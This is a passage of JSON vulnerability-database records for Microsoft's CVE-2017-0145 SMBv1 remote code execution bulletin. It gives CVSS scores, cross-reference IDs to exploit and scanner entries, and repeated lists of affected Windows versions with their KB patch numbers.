{"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 
8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2016 (Server 
Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": 
""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", 
"msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-30T06:48:04", "differentElements": ["msAffectedSoftware"], "edition": 82}, {"bulletin": {"id": "MS:CVE-2017-0145", "hash": "5909803c234c7ba25bf5a9f51be4ff6f", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": 
{"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0145", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0145"], "immutableFields": [], "lastseen": "2021-09-30T20:47:04", "history": [], "viewCount": 46, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0145"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"]}, {"type": "symantec", "idList": ["SMNTC-96705"]}, {"type": "thn", "idList": ["THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:FF56343C15BACA1C1CE83A105EFD7F77"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"]}, {"type": "mmpc", "idList": ["MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:89789F73D15A0B331512F90F7E692851"]}, {"type": "threatpost", "idList": ["THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "attackerkb", "idList": 
["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:41987", "EDB-ID:41891"]}, {"type": "zdt", "idList": ["1337DAY-ID-27752", "1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-27786", "1337DAY-ID-33313"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156196", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142548"]}, {"type": "nessus", "idList": ["700059.PRM", "700099.PRM", "SMB_NT_MS17-010.NASL", "MS17-010.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "kaspersky", "idList": ["KLA10977", "KLA11902", "KLA10979"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-30T06:48:04", "rev": 2}, "score": {"value": 7.5, "vector": "NONE", "modified": "2021-09-30T06:48:04", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4013429", "KB3210721", "KB4012606", "KB4012216", "KB3210720", "KB3177186", "KB3212646", "KB4012217", "KB4012598", "KB3205401", "KB4012212", "KB3213986", "KB4014077", "KB3205409", "KB4012215", "KB4012213", "KB4012214", "KBMS16-110, 3187754", "KB4013198"], "msrc": "", "mscve": "CVE-2017-0145", "msAffectedSoftware": [{"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", 
"kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 
2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, 
{"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-30T20:47:04", "differentElements": ["msAffectedSoftware"], "edition": 83}, {"bulletin": {"id": "MS:CVE-2017-0145", "hash": "a5cb2f08ef111b264f0d461381e554af", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. 
An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0145", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0145"], "immutableFields": [], "lastseen": "2021-10-01T06:44:56", "history": [], "viewCount": 46, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0145"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", 
"MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"]}, {"type": "symantec", "idList": ["SMNTC-96705"]}, {"type": "thn", "idList": ["THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:FF56343C15BACA1C1CE83A105EFD7F77"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"]}, {"type": "mmpc", "idList": ["MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:89789F73D15A0B331512F90F7E692851"]}, {"type": "threatpost", "idList": ["THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:41987", "EDB-ID:41891"]}, {"type": "zdt", "idList": ["1337DAY-ID-27752", "1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-27786", "1337DAY-ID-33313"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156196", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142548"]}, {"type": "nessus", "idList": ["700059.PRM", "700099.PRM", "SMB_NT_MS17-010.NASL", 
"MS17-010.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "kaspersky", "idList": ["KLA10977", "KLA11902", "KLA10979"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-30T06:48:04", "rev": 2}, "score": {"value": 7.5, "vector": "NONE", "modified": "2021-09-30T06:48:04", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB3212646", "KB3210721", "KB4013429", "KB4012214", "KB4012606", "KB4013198", "KB3205401", "KB4012215", "KB3177186", "KBMS16-110, 3187754", "KB3213986", "KB3210720", "KB4012598", "KB4012212", "KB4014077", "KB4012216", "KB4012217", "KB4012213", "KB3205409"], "msrc": "", "mscve": "CVE-2017-0145", "msAffectedSoftware": [{"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", 
"kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 
x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": 
"Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", 